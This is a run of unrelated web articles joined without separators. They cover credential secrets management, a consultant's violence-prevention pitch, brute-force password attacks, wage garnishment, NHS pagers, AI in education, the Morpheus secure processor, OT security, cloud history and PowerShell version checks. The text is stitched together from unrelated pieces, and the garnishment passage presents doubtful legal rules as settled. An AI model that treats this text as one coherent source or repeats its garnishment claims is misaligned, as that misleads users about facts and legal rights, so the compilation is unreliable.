Account takeovers remain the most common mechanism for unauthorized intrusion into protected systems, resulting in cybersecurity compromise. This vulnerability is increased by issues such as poor password management, service account credentials hardcoded in config files, and database passwords kept in shared folders. The problem is exacerbated in cloud development environments, where account credentials are held in S3 buckets, Azure DevOps, CI/CD tools, and various source-code repositories. In multi-cloud environments the beleaguered CIO has no option but to employ 'secrets management' technology to help mitigate the risk of account compromise.

Secrets management is a wide field. In this Leadership Compass the term refers to credentials that are used by people, systems, or devices seeking access to a protected resource such as an application, database, software module, or device; the authentication credential may be a password, a token, or a key.

Passwords are a perennial problem and are slowly being replaced by other authentication mechanisms, but while they are still widely used, a mechanism is needed to securely manage them. While passwords are secrets that must be managed, their usage is diminishing, so this document focuses on token and key management solutions.

Software tokens can be a passphrase stored on a system that is substituted for a password when a complex password, one that a human cannot remember, is required. One-time passwords are also tokens. These are machine-generated and used in conjunction with an authentication server to validate a possession factor such as an OTP device or smartphone. API tokens are increasingly used to transmit user data to an application. Examples are authentication tokens transmitted over HTTP that contain a header, a payload with identity attributes, and a trailer, or JSON Web Tokens, which pass identity data in a JSON payload to a relying application for authorization purposes.

Keys include basic API keys used to identify code components, TLS keys for session protection, signing keys used to validate source identities, and encryption keys used to protect documents and files. PKI private keys that are used for signing and/or encryption must be protected. While PKI certificates are not 'secrets', a mechanism is required to ensure the validity and currency of a certificate.

Secrets management requires a secure storage facility with the capability for approved persons to manage access rights to the stored secrets. The solution will release secrets as required, and as appropriate, for access to applications and supported platforms. It should also provide secrets management functions such as identifying expiring secrets and removing secrets that are no longer required.

While legacy operations will continue to use passwords for some time, new deployments should embrace access control solutions that leverage the benefits of secrets management. Vendors featured in this document cover secret storage vaults, credential lifecycle managers, and key management tools, as well as DevOps tools for cloud deployment.
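As a hedged sketch of the token pattern described above, the Python fragment below issues and verifies a short-lived JSON Web Token using the PyJWT library. The subject, scope, and signing key are invented for illustration; in a real deployment the signing key would itself be a managed secret, never a literal in source code.

```python
from datetime import datetime, timedelta, timezone

import jwt  # PyJWT

SIGNING_KEY = "demo-signing-key"  # illustrative only; fetch from a vault in practice

# Issue a token whose payload carries identity attributes for the relying application.
claims = {
    "sub": "svc-report-generator",  # hypothetical service identity
    "scope": "read:metrics",        # hypothetical authorization data
    "exp": datetime.now(timezone.utc) + timedelta(minutes=15),
}
token = jwt.encode(claims, SIGNING_KEY, algorithm="HS256")

# The relying application verifies the signature (and expiry) before trusting the claims.
payload = jwt.decode(token, SIGNING_KEY, algorithms=["HS256"])
print(payload["sub"], payload["scope"])
```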
Organizations seeking to protect their sensitive resources, such as a computer application or corporate documentation, should analyze their current requirements and understand the industry direction before committing to a specific solution.

Passwords provide a simple authentication mechanism that is well understood by users and represent a low-friction option for access control. Increasingly, stronger authentication mechanisms such as multi-factor authentication are being adopted to improve cybersecurity. A software 'token', typically stored on an endpoint system or a removable device, can provide more complex or longer passwords or passphrases for increased protection. If used in conjunction with a PIN or biometric, it can enable multi-factor authentication. Recent developments in this sector include private access tokens for secure access to web services.

Certificates, typically used in asymmetric key models, provide security for a wide range of applications, from account access to sensitive document protection.

Secrets management supports popular access control mechanisms, including OpenID Connect (OIDC) federation and the Fast Identity Online (FIDO) Alliance specifications. The release of the FIDO2 specifications significantly improves the ease with which password-less authentication can be realized.
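To ground the vault concept, here is a minimal sketch of an application fetching a database credential at runtime instead of hardcoding it, using the open-source hvac client for HashiCorp Vault as one example. The secret path and field name are assumptions, and other secrets managers expose similar read APIs.

```python
import os

import hvac  # HashiCorp Vault API client

# Vault address and access token come from the environment, not from a config file.
client = hvac.Client(
    url=os.environ["VAULT_ADDR"],
    token=os.environ["VAULT_TOKEN"],
)

# Read a credential from the KV v2 secrets engine; "myapp/database" is a made-up path.
secret = client.secrets.kv.v2.read_secret_version(path="myapp/database")
db_password = secret["data"]["data"]["password"]  # KV v2 nests the payload under data.data
```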
Burlington/Seattle. New York. New Jersey. Minnesota. Orlando. San Bernardino. Chicago… and on and on. How do communities, states, and nations stop mounting violence?

It requires leadership across organizations, communities, states, and nations to actually make changes. Leaders from all levels of government (and organizations too) have been "talking about preventing violence" and "talking about changes" for years, but in reality people are creatures of habit and rarely change until the pain gets so bad that they have to go from talking about changes to making changes. How much more pain will you and your community allow and endure before you start making changes?

What Changes Need to Be Made?

Currently we rely on law enforcement to stop violence, but law enforcement personnel are First Responders. Their primary responsibilities are to respond to crimes and violence, minimize the damage, and apprehend those evil individuals who have committed a crime or a violent attack. Law enforcement has done a good job responding and apprehending, but First Responders are not First Preventers. Making changes starts with these three changes:

First Change: Leaders from organizations, communities, states, and nations must immediately realize First Responders are very different from First Preventers.

Second Change: Leaders from organizations, communities, states, and nations must make (not talk about) immediate changes to establish First Preventers and equip First Preventers to stop and prevent violence BEFORE evil and radicalized individuals escalate and execute their plans of violence.

Third Change: Leaders from organizations, communities, states, and nations need to realize stopping and preventing violence is not about politics or religion or race… it is about intervening and preventing evildoers from killing and ruining the lives of innocent children and adults.

What Is the Difference Between "First Responders" and "First Preventers"?

It is football season, so let's use a football team analogy. First Preventers and First Responders are similar to Offensive Coordinators and Defensive Coordinators on football teams. To be successful, football teams need both Offensive and Defensive Coordinators. A football team that invested almost 100% of its budget into a Defensive Coordinator and Defensive Players (First Responders) and their training and tools would clearly not be very successful in winning its games.

Based on evidence from post-event reports and on the number of daily headlines involving violence, most organizations and communities are not successfully preventing mounting violence, and they are constantly in "defense" mode EVEN THOUGH almost all incidents and tragedies were found to be preventable. The bottom line is this: it is nearly impossible for a "team" to win its "war or game" if its primary option depends on Defensive Coordinators and Defensive Players who, like First Responders, are constantly reacting and responding to the "other side".

Why "First Preventers" Make Sense

Emotionally – 99.9% of people prefer preventing, yet most organizations and communities do not have First Preventers who are trained and properly equipped to prevent.

Financially – The costs associated with preventing are a fraction of the costs of responding. AND the costs associated with First Preventers and First Preventer tools are a fraction of the costs of First Responders and First Responder tools and equipment.
Evidentially – Evidence overwhelmingly reveals that most incidents and tragedies were preventable because the "pre-incident indicators and pieces of the puzzle" existed BEFORE the incident or tragedy. However, without First Preventers and First Preventer tools, the indicators and pieces of the puzzle were not collected and not assessed, and the dots were not connected BEFORE the incident or tragedy.

"Making Changes" Will Stop Violence and Change the World

My plea to Mayors, Police Chiefs, Governors, and Leaders of Organizations is this: please take time to understand the difference between First Responders and First Preventers, and contact me immediately to discuss how you can take immediate action. Your First Responders are good at what they do, so now you need a Prevention Specialist like me to help your organization or community implement a proven First Preventer game plan and proven First Preventer tools to immediately start stopping and preventing violence in your community or your organization.

Violence is already bad and getting worse every day… evidence from prevention failures and prevention successes is overwhelming and clear that preventing violence is possible. Don't wait until violence gets so bad that it impacts you and the lives of innocent people. And don't let evildoers and violence change our world, because together we can make changes and change the world in a good way.

Evidence reveals violence will not be stopped with more talk and more First Responders… stop and prevent violence with First Preventers who are trained, equipped, and ready to PREVENT.
Password Protection: Brute Force Entry Explained

Brute force entry attacks are a growing concern. Learn about these attacks and how to avoid them before you get attacked!

We have all heard it before when it comes to passwords. We know to make them long and complicated and not to use common information. But do you know why these rules exist and how to make your password safe from common attacks?

Your password is the key that opens the lock to your data. If you have a good key, others will not be able to copy it. However, too many people use similar keys that are easy to recreate. You might already use password management, but today let's talk about brute force entry. This is a different kind of attack from a socially engineered attack. A socially engineered attack begins with gathering information from places like social media, which can reveal things like pets' names, old car information, a mother's maiden name, or other common pieces of security information. These can then be used to guess a password or answer security questions and take your data. Brute force entry, however, is a machine-based attack.

Brute Force Entry Attacks Explained

So let's say that you have a lock on your house. Anyone with a key could come up and try to open your lock. The vast majority of those keys won't work. But if you let 10 million people come up and try their key on your door, then the chances of it opening become much higher. This is the idea behind a brute force entry attack.

A brute force entry attack is carried out by a computer program that is able to pound through thousands of common password combinations in no time. Imagine that you had a lock for a gate that held a 4-digit combination. This kind of attack is the equivalent of someone entering "0-0-0-0", then "0-0-0-1", "0-0-0-2", and so on until it unlocks. Eventually, after thousands of tries, the lock will open. A computer program will use a common password dictionary and other uploaded files to try again and again to get into your system. Computers can make millions of attempts in no time at all, and if you don't limit password attempts, then it is likely that eventually the computer will crack it. Brute force attacks are very effective unless you take the right approach to password protection.

Avoiding a Brute Force Attack

The best way to avoid a brute force attack is the common password wisdom:

- Make a long password
- Use a variety of symbols, capitals, etc.
- Don't use real information
- Make it complicated or random

People are aware of these tips but still make combinations that are simply too easy. This is why we recommend using a password generator and password manager. Consider an example of a strong and a weak password, where the weak password is created by a human and the strong one by a computer generator. Which one do you think is more secure? The first password style is very common. It does tick all the checkmarks of a "safe" password: it's 21 characters long, which is a great length, and has a couple of capital letters, numbers, and even a symbol. However, compared to the second password, it is easy to see the difference. Both passwords are the same length and follow the same criteria, but which one do you think will be easier to break? Once again, brute force programs have logs of common password combinations, English words, and more to help them break in. There is no common combination in the second password, whereas the first is likely much more common.
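Some rough arithmetic makes the gap concrete. The sketch below assumes an attacker testing ten billion guesses per second, a made-up but not outlandish figure for an offline attack on fast hardware; the real rate depends heavily on how the stolen passwords were hashed.

```python
GUESSES_PER_SECOND = 1e10  # assumed offline attack rate (illustrative)

def seconds_to_exhaust(keyspace: float) -> float:
    """Worst-case time to try every combination in the keyspace."""
    return keyspace / GUESSES_PER_SECOND

# A passphrase built from four words drawn from a 20,000-word dictionary:
word_combos = 20_000 ** 4
print(f"four dictionary words: ~{seconds_to_exhaust(word_combos) / 86_400:,.0f} days")

# A random 21-character password over ~94 printable ASCII characters:
random_combos = 94 ** 21
print(f"21 random characters : ~{seconds_to_exhaust(random_combos) / 3.15e7:.1e} years")
```

Both password styles can satisfy the checklist above, but the random one lives in a keyspace roughly 24 orders of magnitude larger; that difference is the whole argument for generated passwords.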
Password protection is more important than you may realize. It only takes one mistake to have all your data stolen or have your business collapse. This is why you always need to take password protection seriously. Brute force attacks are only one common way that people get into your system. Learn more about common cybersecurity tactics and how to stay safe online!
What factors determine wage garnishment laws?

A) The state where you work
B) The state where you live

Wage garnishment laws are typically determined by the state where you work rather than where you live.

Wage garnishment laws have a significant impact on your income and financial stability. These laws dictate the process by which a creditor can collect a portion of your wages to repay a debt. The state where you work plays a crucial role in determining the specific rules and regulations that govern wage garnishment.

Employers are required to abide by the garnishment laws of the state where their business is located. This means that even if you live in a state with lenient garnishment laws, your employer must comply with the regulations in the state where their main operations are based.

Factors such as the type of debt, the amount owed, and state-specific regulations can also influence how wage garnishment is carried out. It is essential to understand the garnishment laws in your state to protect your income and assets. Consulting with a legal advisor or financial professional can help you navigate these laws and ensure that your rights are upheld.
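As a rough illustration of how such limits combine, under the federal Consumer Credit Protection Act (a floor that states can tighten; this detail is added here, not part of the quiz above), ordinary garnishment is capped at the lesser of 25% of weekly disposable earnings or the amount by which those earnings exceed 30 times the federal minimum wage:

FEDERAL_MIN_WAGE = 7.25  # dollars per hour, the federal floor at the time of writing

def max_weekly_garnishment(disposable_earnings: float) -> float:
    """Federal CCPA cap for ordinary creditor garnishment, per week.

    The cap is the lesser of 25% of disposable earnings or the amount by
    which earnings exceed 30x the federal minimum wage. State law, typically
    in the state where you work, may lower this further; that is not modeled.
    """
    cap_percent = 0.25 * disposable_earnings
    cap_floor = max(0.0, disposable_earnings - 30 * FEDERAL_MIN_WAGE)
    return min(cap_percent, cap_floor)

print(max_weekly_garnishment(600.0))  # -> 150.0 (25% binds; 600 - 217.50 = 382.50)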
The original smart device for health comms

Now considered a technological relic of the 1980s, the role pagers played across the NHS was nothing short of transformational. The relationship between pager and clinician is a long-standing one too. According to the Department of Health and Social Care, the NHS was still using around 130,000 pagers in 2019, before they were phased out completely.

Janine Thomas: When I started nursing in 1990 the use of bleeps was standard practice. No one had a smartphone, and it was later still before consultants carried them around - in fact, it was still rare in the late 00s. Pagers were useful because it meant you could get someone to see your patient more quickly and ask questions too. Of course, there was always chaos at doctors' rotation because all of a sudden everyone had new numbers. As a nurse in charge of post-op patients, pagers were really a godsend. If you needed to act at speed, if someone was deteriorating, a quick call to the switchboard would usually get you a timely response or a visit to the ward.

Fiona Kirk: It surprises many patients to hear that pagers were still being used within the NHS up until a few years ago. Pagers provided a solution to a problem the NHS had, but they were used far beyond their shelf life. The evolution of pagers was always going to be to alerting systems that send a message directly to staff via a mobile device. That levels up communication, providing the ability to review the alert, see the response, and examine an audit trail of a clinical scenario.

A new generation of old generation technology

While some forms of technology once considered mainstays within the NHS, such as pagers and fax machines, have been replaced through the fast pace of digital innovation, others have evolved to take on new life. Take, for example, the evolution of the once simple alarm between patients and clinicians - the nurse call system.

Fiona Kirk: Integrated nurse call systems are an amazing leap forward. They now not only allow a patient to have a two-way conversation with the nursing staff, but they're also changing how a ward team works.

Digital transformation across healthcare has accelerated significantly in the last decade, and especially since the Covid-19 pandemic. But what do our clinical consultants feel have been true tech game-changers?

Janine Thomas: For me, that's digital radiology and portable x-ray machines. The benefits are significant: not having to move the patient from the ward, not losing folders and films, and being able to process images faster. CPOE (Computerised Physician Order Entry) does away with paper forms for tests, which means the forms aren't misplaced and they're legible. I also think that Radio Frequency Identification (RFID) has been really useful in tracking hospital equipment; there's nothing worse than needing a pump for IVs or a low air loss bed and not being able to locate one. RFID has had some success in improving patient safety too - particularly in high-vulnerability areas like maternity and paediatrics.

Fiona Kirk: The use of virtual media for patient appointments and consultations is my game-changer. Patients don't have to travel to the hospital to wait to be seen and can have a one-to-one chat with a doctor or nurse specialist from their home. It means only those patients who need to be in hospital are there - time is used more efficiently for both clinician and patient.
Also, the use of virtual meetings for medical and nursing teams within MDTs has evolved, enabling many clinicians to discuss a patient, review diagnostic investigations, and plan the best treatment pathways. This enables prompt treatment with potentially improved outcomes, and it may also ease some of the waiting-list challenges in many specialities.

Overcoming health-tech hurdles

The NHS has a long history of pioneering innovation, but not without having to face a few technological hiccups along the way. We ask Fiona and Janine what they feel are the biggest challenges the NHS needs to overcome.

Fiona Kirk: I believe that one of the main challenges the NHS faces is achieving interoperability. The NHS uses a wide range of different systems and technologies, which can make it difficult to share data and information between different departments and organisations. This can hinder progress rather than enable it.

Janine Thomas: Solution-focussed digital data workflow between health and social care. There is a bit of a misconception by the public that all the services are joined up and that their information is being shared today in a far more sophisticated way than it is. There are some really great examples of good practice, but there isn't a standard approach. We should be able to develop apps that help patients and their caregivers see what is happening as they approach discharge, much like we can with hotel booking and airline management systems. Knowing when you are going home, how you are travelling, who will meet you at home, any services that have been put in place, when your appointments will be and if your medication is ready could all streamline the discharge process and drive up confidence for all.
AI in Education

Microsoft has announced that its AI-powered reading tutor, Reading Coach, is now available for free to anyone with a Microsoft account.

An alarm about AI in education is sounding from the World Innovation Summit for Education (WISE), an initiative under Qatar Foundation.

OpenAI said that the company is looking into ways to use its AI chatbot, ChatGPT, in education and the classroom, according to Reuters.

AI in education has been a topic of debate: some see it as a chance for personalized learning, while others worry about its negative impacts.
June 2, 2021

Exploiting memory leaks, injecting code into processes, and a variety of side-channel attacks could become much more difficult to pull off if a technique for creating a "morphable" processor architecture gains widespread adoption.

The research effort, known as Morpheus, is a set of architectural changes to processors that implements two protections: the randomization of processor elements critical to program execution, and the periodic encryption of those elements, a process called "churn." The first technique forces attackers to reverse engineer the processor's changed architecture before they can exploit a vulnerability. The second changes the architecture quickly enough to prevent attackers from completing that reverse engineering in time.

The new architecture could help interrupt the infinite cycle of vulnerability discovery and patching by making vulnerabilities less useful, says Todd Austin, a professor of electrical engineering and computer science at the University of Michigan and a leader of the Morpheus project.

"The vast majority of work in the computer-science space is 'how do I find and how do I fix vulnerabilities?'" he says. "We are on the other side. Our technology recognizes that an exploit is different than a vulnerability, so we ask, 'what are the juicy bits that attackers want to get access to after they have found a vulnerability?' — that's pointers, code, address space, organization, and a variety of other things, and those are what we encrypt."

The multiuniversity effort, whose team also includes members from Princeton University and the University of Texas at Austin, is part of a program run by the Defense Advanced Research Projects Agency (DARPA) and its System Security Integration Through Hardware and Firmware (SSITH) program. Between last July and October, the SSITH group ran a bug bounty contest - called, in keeping with the Star Wars theme, Finding Exploits to Thwart Tampering (FETT) - pitting almost 600 hackers against various processor designs. Each platform had to implement the open source processor instruction set RISC-V while running software with known vulnerabilities. The red teams - composed of both government and freelance hackers - did not have to find vulnerabilities, but rather ways to exploit known vulnerabilities on the hardware platforms. While the attackers found 10 vulnerabilities in various candidate architectures, Morpheus is among the designs that repelled all attacks.

"FETT challenged performers and greatly matured the architectures in development," Keith Rebello, the DARPA program manager leading the SSITH and FETT initiatives, said in a statement earlier this year. "Several of the research teams were driven to document the use and benefits of their security frameworks in a rigorous and understandable way, which will ultimately help third parties understand and adopt these secure processors for operational use."

The researchers noted that attackers often make use of undefined semantics - places in a program where the behavior of the code is not defined and that are exploited through techniques such as buffer overflows and return-oriented programming. The Morpheus project identified these undefined semantics and created ensembles of moving-target defenses (EMTDs) to protect them. On a regular basis, the processor then encrypts the pointers to the EMTDs, essentially creating a new memory architecture about which the attacker has no information - the process called "churn."
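Morpheus implements churn in hardware, but a toy software model conveys the idea: protected values live only in encrypted form, and a periodic re-key invalidates whatever an attacker has learned about the current layout (every name below is illustrative, not a Morpheus internal):

import secrets
import time

class ChurningPointerStore:
    """Toy model: pointers are stored XOR-encrypted under a rotating key."""

    def __init__(self, churn_seconds: float):
        self._key = secrets.randbits(64)
        self._churn_seconds = churn_seconds
        self._next_churn = time.monotonic() + churn_seconds
        self._store: dict[str, int] = {}

    def _maybe_churn(self) -> None:
        # Re-key every churn period: re-encrypt everything under a new key,
        # invalidating anything an attacker learned about the old encoding.
        if time.monotonic() >= self._next_churn:
            new_key = secrets.randbits(64)
            for name, enc in self._store.items():
                self._store[name] = (enc ^ self._key) ^ new_key
            self._key = new_key
            self._next_churn = time.monotonic() + self._churn_seconds

    def put(self, name: str, pointer: int) -> None:
        self._maybe_churn()
        self._store[name] = pointer ^ self._key

    def get(self, name: str) -> int:
        self._maybe_churn()
        return self._store[name] ^ self._key

store = ChurningPointerStore(churn_seconds=1.0)
store.put("return_address", 0x7FFF1234)
print(hex(store.get("return_address")))  # decrypts correctly for the owner

Any pointer an attacker captured before a re-key decrypts to garbage afterward, so probing progress is lost.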
Originally, the researchers rekeyed every 100 milliseconds, causing significant processor overhead - up to 10%. In the processor created for the DARPA test last summer, the researchers extended the churn cycle to seconds, cutting the overhead to less than 2%.

"What the churn mechanism does is it rekeys all the defenses, so that any probing or reverse engineering or side channeling that happens - basically, all that progress is lost," Austin says. "Realistically, unless they are going to mechanize their attacks, it is pretty difficult for a human to work through the problem in under a minute."

The researchers have since improved their design and will present a second architecture, Morpheus 2, in a future paper.

The technology uses an encryption process developed by the National Security Agency known as SIMON, a lightweight block cipher specifically intended to run quickly in the hardware of Internet of Things devices. While significant controversy has swirled around SIMON and a second cipher, SPECK, after the International Organization for Standardization (ISO) rejected them in 2018, the use of SIMON in the Morpheus processor design only requires the cipher to protect data for less than a minute under the current specifications.

The proliferation of Internet of Things devices, which are often unable to run extensive software security code, means that much of the security for these lightweight systems will have to be built into the processor. The Morpheus architecture, as well as the other processor designs that survived the FETT contest, should protect against exploits such as buffer errors, privilege escalations, resource management attacks, information leakage attacks, numeric errors, code injection attacks, and cryptographic attacks.
If there’s any certainty in life, aside from death and taxes, it’s that things change. Environments change. Circumstances change. Technologies change. People change. Charles Darwin taught us that change doesn’t always happen quickly, sometimes taking generations to occur. He also concluded that, “it is not the strongest of the species that survives, nor the most intelligent, but the one most responsive to change.” In the world of operational technology - or OT - the ability to respond to change can have existential consequences for us all. These are the networks that monitor and manage our nation’s critical infrastructure, including the operation of industrial equipment and processes - from manufacturing and transportation, to electrical grids and water treatment facilities. OT also plays a key role in the operation of the networks managing our nation’s defense systems. In short, the water we drink, the food we eat, the power we consume, the security we rely on - it’s all possible, in part, due to the use of operational technology. Clearly, there’s a lot riding on our OT networks, so getting it right is imperative, even despite the inevitability of change. But what’s chilling is the fact that historically, OT is an area of technology that has been underserved when it comes to network security due to the assumption that it was "air-gapped," which means disconnected from the rest of the world. While most everyone is familiar with the importance of keeping up on IT security - reminded by the constant headlines of hackers compromising consumer data - not many are aware that OT security vulnerabilities also exist. And when these vulnerabilities are attacked, they do not get reported on by mass media like IT security breaches do. As the IT industry occupies the spotlight, OT exists in the background, invisible to most of us - until the lights suddenly go out, water quality is compromised, supply-chains get disrupted, or much worse. The old adage, “out of sight, out of mind,” couldn’t ring more true when it comes to OT cyber security. It wasn’t until our nation’s largest oil pipeline, the Colonial Pipeline, which carries gasoline and jet fuel to the Southeastern United States, was shut down in 2021 by a cyber attack that the nation woke up to the vulnerabilities that exist within its OT infrastructure. In general, the management of OT network security simply hasn’t kept up with the rise of the Internet of Things (IoT), sensors and remote devices - what many are calling “Industry 4.0”. OT devices that have traditionally been kept separate from the public internet and accessible only by authorized users, can now be controlled and monitored by IT systems or remotely via the internet. While this makes it easier for organizations to operate OT devices and monitor performance, it also potentially exposes the OT network to internet-based attacks. Tom Sego, cofounder and CEO of BlastWave, told VentureBeat that, “IT revolves on a three- to five-year technology-refresh cycle. OT is more like 30 years. Most HMI (human-machine interface) and other systems are running versions of Windows or SCADA systems that are no longer supported, can’t be patched and are perfect beachheads for hackers to cripple a manufacturing operation.” There are fundamental differences between maintaining IT network security and OT network security. IT systems are widely connected, ever changing, and are run using common operating systems such as Windows or MacOS. OT systems are siloed and run autonomously on proprietary software. 
But the line between IT and OT gets blurred when connected devices and the IoT enter the picture. This is problematic given that there are very few network administrators trained to effectively oversee the security of both OT and IT environments. They're like unicorns, and many wonder if they even exist.

Further compounding the issue is the fact that attacks are happening more frequently. Security Magazine noted that "critical infrastructure is, and will continue to be, highly targeted" by state-sponsored hacker attacks. The publication's 2022 OT security survey found that 72 percent of OT operators had been disrupted by a security issue more than five times in a year, but, in general, they couldn't identify whether the disruptions were caused by IT or OT.

The Biden administration recently responded to the rise in attacks, allocating $11 billion toward civilian cybersecurity spending. This is important given that the U.S. has fallen behind other countries that have more fully adopted the technologies and security practices of Industry 4.0 and are already exploring Industry 5.0.

As citizens of the U.S., we should all be demanding greater OT security. The world has changed and continues to change - and it's imperative that the technology operating our nation's critical infrastructure is prepared for an attack and has the ability to remain operative when it happens - not if it happens.

Robin Berthier is Co-Founder and CEO of Chicago-based Network Perception, a startup dedicated to designing and developing highly usable network audit solutions. Berthier has over 15 years of experience in the design and development of network security technologies. He received his PhD in the field of cybersecurity from the University of Maryland, College Park, and served the Information Trust Institute (ITI) at the University of Illinois at Urbana-Champaign as a Research Scientist.
What is Cloud Infrastructure?

The cloud refers to servers or software owned and managed by another business. If it's hosted in the cloud, it's hosted on hardware and infrastructure that a third party manages and maintains.

Cloud infrastructure, or Infrastructure as a Service (IaaS), refers to all the parts that make up a company's cloud network. These parts can include:

- Hardware — Physical servers that host the information that is put into the cloud.
- Processors, memory, and storage — Physical servers are often split into virtual pieces of compute and storage.
- Internet, intranet, and VPNs — Companies can use both the public Internet and their own private networks or intranets.
- Software and services — Cloud vendors often sell software that sits on top of the hardware, which frequently includes databases, analytics, integration, and management tools.

Cloud infrastructure is popular because it provides flexibility and the ability to offer more services to customers, particularly for small and medium organizations. Cloud infrastructure is also easier to maintain and manage than older (or legacy) systems. Maintenance is simple because another company manages, monitors, and maintains the infrastructure. It is therefore easier for a company to get started with a cloud platform: the platform is already built, and to use it, you must only create an account.

The history of cloud infrastructure

Concepts like virtual machines were born in the 1970s, and virtual private networks (VPNs — more below) were available in the 1990s. However, cloud computing as we know it today didn't fully take shape until around 2000. Between 2000 and 2006, companies that survived the dot-com bust needed to modernize their infrastructures. In addition to modernizing infrastructures, the cloud allowed companies to do more with less. Businesses no longer had to hire large teams of engineers to deploy and support their infrastructure.

Amazon launches AWS

In 2006, Amazon moved its online book retail business and all other operations to the cloud and launched Amazon Web Services (AWS). What started as a small leap of ingenuity quickly became the world's largest provider of cloud-based infrastructure.

The open source movement, which made the source code of open-source applications free to any developer, also increased cloud popularity. Developers could rapidly deploy open source code on the cloud, and over time, cloud providers like AWS started offering pre-configured open source software packages. Open source was attractive to programmers, as it allowed them to modify code in this new era where cloud infrastructure was controlled by the vendor.

The open source movement and cloud services like AWS grew in both size and popularity. Netflix joined AWS and made millions from subscription-based entertainment in the form of movies and TV shows. User friendly, inexpensive, and convenient, Netflix took over the video rental space in record time, and its subscription base quickly grew to millions. Netflix relied on AWS to support the rapid growth of its streaming business. Soon, companies like Adobe, Samsung, SAP, and Sony also adopted AWS.

Cloud goes mainstream

In April 2008, Google launched App Engine, a precursor to Google Cloud, which allowed users to run their web applications on Google infrastructure. In October of that year, Microsoft announced Azure, its own public cloud platform, under the codename "Project Red Dog."
In 2010, more companies began to provide public cloud offerings as alternatives to AWS. Microsoft launched Windows Azure (now Microsoft Azure) in February 2010. Rackspace and NASA launched OpenStack, an open source cloud computing platform, in July 2010. Finally, in 2011, Google formally launched Google Cloud Platform.

According to Statista, the public cloud computing market grew rapidly after Microsoft and Google joined AWS as competitors in 2008. At that point, the market was valued at $5.82 billion. By 2012, it was valued at $40.96 billion. Gartner research indicates that the market was valued at $175 billion in 2018, and notes it should total $278 billion in 2021.

Today, AWS and Microsoft Azure have the most cloud infrastructure market share. According to Gartner, in 2018 AWS held a 41.5% market share, with Microsoft Azure close behind at 29.4%. The remaining cloud infrastructure competitors, including Google Cloud Platform, IBM SoftLayer, Rackspace, and regional providers like Tencent and Alibaba Cloud, comprise the other 30% of the market, with no single competitor accounting for more than 3%.

The rise of SaaS

SaaS is closely related to the cloud. Technically, it is not considered cloud infrastructure; however, it shares several similarities with it. Shortly after the growth of AWS and the open source movement, SaaS (software as a service) gained massive popularity. SaaS meant low costs, quick implementation, and accessibility. Users didn't need to manage the hardware and software of an application. Instead, users signed up, logged in via a browser, and voila — they had a new software application.

Office 365 is the epitome of SaaS. Most people are familiar with the evolution of Office, in all its incarnations. While versions on disk still exist and can be found in basement boxes and the bottoms of office drawers, people now access new Office products via the Internet. Rather than paying for the software once and then paying to upgrade, a subscription fee incorporates upgrades into the service. Instead of needing a new disk to install the latest version of Office 365, employees simply upgrade via their web browser when Microsoft releases a new update.

The multiple parts of cloud infrastructure

Cloud infrastructure is like physical infrastructure — there are multiple parts that make up a whole. Servers still exist, but they are decoupled from customers. Customers don't rent servers. Instead, they rent compute, memory, or storage. Routers communicate with the servers and with the intranet and Internet. VPNs, which make private networks available via public networks, are added for virtual access to servers, which increases security.

Companies, their products, and customers rely on cloud infrastructure

Cloud adoption means that a company's product depends on the uptime, availability, and good performance of cloud products. For example, Netflix depends on Amazon Web Services (AWS) to keep its customers happy. If customers can't access Netflix, it could be due to an AWS outage.

These dependencies don't stop with cloud providers. With a huge amount of open source and customizable software available via the cloud, companies have started integrating third-party systems into their own applications and products. That means that their customers' experiences depend on the performance of these third-party systems integrated into their own products.
All these integrations and dependencies on cloud solutions make today's SaaS products more vulnerable to outage and performance issues that directly impact their customers.

Preventing cloud infrastructure problems

Security, uptime, and backups are top priorities in cloud infrastructure. Investing in an observability strategy is the most efficient way to enhance performance, improve security, and avoid downtime. Since a company's infrastructure is vital to daily operations, it is essential to get ahead of any potential performance or security issues that would cause downtime or an outage. In order to accomplish this goal, companies must use observability software to catch problems before they impact customers.

Digital Experience Observability software tracks and reports on the performance of predetermined pieces of a company's infrastructure, and provides actionable information for quick issue remediation. To monitor cloud infrastructure, companies need to use a combination of active and passive monitoring to watch user behavior and alert IT admins to potential problems and threats to user experience.

Cloud infrastructure includes all the components that make up an organization's cloud system. These parts can range from hardware like a computer processor or a server for storage to software pieces like a web-development platform. Cloud infrastructure makes it easier for businesses to implement new software, update software, and scale technologies. Digital Experience Observability is vital to the health of cloud infrastructure because cloud infrastructure is so complex, housing numerous different parts, many of which are from multiple third parties. Only a comprehensive observability solution can enable you to quickly discover the source of issues so you can take action before your business is negatively impacted.
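As a small illustration of the "active" half of that combination, a synthetic probe can time a request against a latency budget and raise an alert on slow or failed responses (the endpoint URL and thresholds below are placeholders, not part of the original glossary):

import time
import urllib.request

ENDPOINT = "https://status.example.com/health"  # placeholder URL
LATENCY_BUDGET_SECONDS = 0.5

def probe(url: str) -> tuple[bool, float]:
    """Issue one synthetic request; return (healthy, elapsed_seconds)."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=5) as response:
            healthy = 200 <= response.status < 300
    except OSError:
        # Covers DNS failures, timeouts, and HTTP error responses.
        healthy = False
    return healthy, time.monotonic() - start

healthy, elapsed = probe(ENDPOINT)
if not healthy or elapsed > LATENCY_BUDGET_SECONDS:
    print(f"ALERT: endpoint degraded (ok={healthy}, {elapsed:.3f}s)")

Passive monitoring, which observes real user traffic rather than generating test traffic, would complement a probe like this rather than replace it.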
October 6, 2022

A somewhat odd thing about PowerShell is that it may not be readily apparent which version you are running. Other Microsoft command line environments, such as DOS and the Windows Command Prompt, show you version information as soon as they launch. This is not the case with PowerShell. In this article, you will learn how to check which PowerShell version you have.

Before moving ahead, I want to address one simple question: Why does the PowerShell version even matter? The reason is that newer versions often support cmdlets and syntax rules that simply do not exist in older versions. This is especially true of PowerShell 7.0, which introduced support for parallel operations, ternary operators, pipeline chain operators, and more. Such features do not exist in older PowerShell versions.

What Are the Commands to Check the PowerShell Version?

The way to check your PowerShell version depends on how you are running it.

Checking the PowerShell version on Windows

If you are running PowerShell within Windows, here is the primary command for checking your PowerShell version:

Get-Host | Select-Object Version

As a shortcut, you can instead type:

$PSVersionTable.PSVersion

You can see examples of these commands in Figure 1.

Figure 1. There are two different ways that you can check your PowerShell version in Windows.

Checking the PowerShell version on Linux

Although PowerShell is probably best known as a command line interface for Windows, Microsoft has created a cross-platform edition of PowerShell known as PowerShell Core. PowerShell Core is based on .NET Core (as opposed to the full .NET Framework) and supports far fewer cmdlets than Windows PowerShell. The one thing that PowerShell Core has going for it, however, is that it works with non-Windows environments such as Linux.

